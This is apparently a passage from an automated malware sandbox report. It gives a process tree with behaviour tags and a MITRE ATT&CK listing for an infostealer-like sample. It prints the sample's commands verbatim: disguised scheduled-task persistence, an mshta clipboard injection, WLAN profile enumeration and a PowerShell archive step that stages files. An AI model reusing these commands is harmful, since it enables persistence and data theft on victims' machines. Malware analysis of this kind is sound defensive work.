1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\DriverHostCrtNet\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4464

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3916

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1692 -ip 1692
1⤵
PID:1012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\DriverHostCrtNet\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\DriverHostCrtNet\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\DriverHostCrtNet\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Uninstall Information\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "43634634634643634634634634" /sc MINUTE /mo 5 /tr "'C:\DriverHostCrtNet\4363463463464363463463463.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "4363463463464363463463463" /sc ONLOGON /tr "'C:\DriverHostCrtNet\4363463463464363463463463.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "43634634634643634634634634" /sc MINUTE /mo 8 /tr "'C:\DriverHostCrtNet\4363463463464363463463463.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4248

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4244

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Executes dropped EXE
PID:1332

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2948

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" "javascript:clipboardData.setData('text','5G#JBNGAJAT2tQ^@I@3PJX#)$JHZZTCE');close();"
1⤵
PID:5352

C:\Users\Admin\AppData\Local\Temp\f60f0ba310\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\f60f0ba310\Dctooux.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4408

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\e8aad92a75ada1\cred64.dll, Main
2⤵
- Loads dropped DLL
PID:4488

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\e8aad92a75ada1\cred64.dll, Main
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:6016

C:\Windows\system32\netsh.exe
netsh wlan show profiles
4⤵
PID:5388

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\168293393341_Desktop.zip' -CompressionLevel Optimal
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5272

C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
3⤵
PID:5312

C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
3⤵
PID:3212

C:\Windows\system32\chcp.com
chcp 65001
3⤵
PID:1928

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\e8aad92a75ada1\clip64.dll, Main
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:1796

C:\ProgramData\hlkwogclqprr\uwgxswmtctao.exe
C:\ProgramData\hlkwogclqprr\uwgxswmtctao.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5732

C:\Windows\explorer.exe
explorer.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2644 -ip 2644
1⤵
PID:2780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1676 -ip 1676
1⤵
PID:2108

C:\Windows\svchost.exe
C:\Windows\svchost.exe
1⤵
- Executes dropped EXE
PID:2004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5168 -ip 5168
1⤵
PID:5412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3044 -ip 3044
1⤵
PID:3608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3968 -ip 3968
1⤵
PID:2300

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe
1⤵
PID:2728

C:\odt\sysmon.exe
C:\odt\sysmon.exe
1⤵
PID:4824

C:\Users\Default User\StartMenuExperienceHost.exe
"C:\Users\Default User\StartMenuExperienceHost.exe"
1⤵
PID:396

C:\Program Files\Windows Security\BrowserCore\smss.exe
"C:\Program Files\Windows Security\BrowserCore\smss.exe"
1⤵
PID:1552

C:\DriverHostCrtNet\4363463463464363463463463.exe
C:\DriverHostCrtNet\4363463463464363463463463.exe
1⤵
PID:5704

C:\Program Files (x86)\Mozilla Maintenance Service\logs\MoUsoCoreWorker.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\logs\MoUsoCoreWorker.exe"
1⤵
PID:5844

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scripting

T1064

Scheduled Task/Job

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery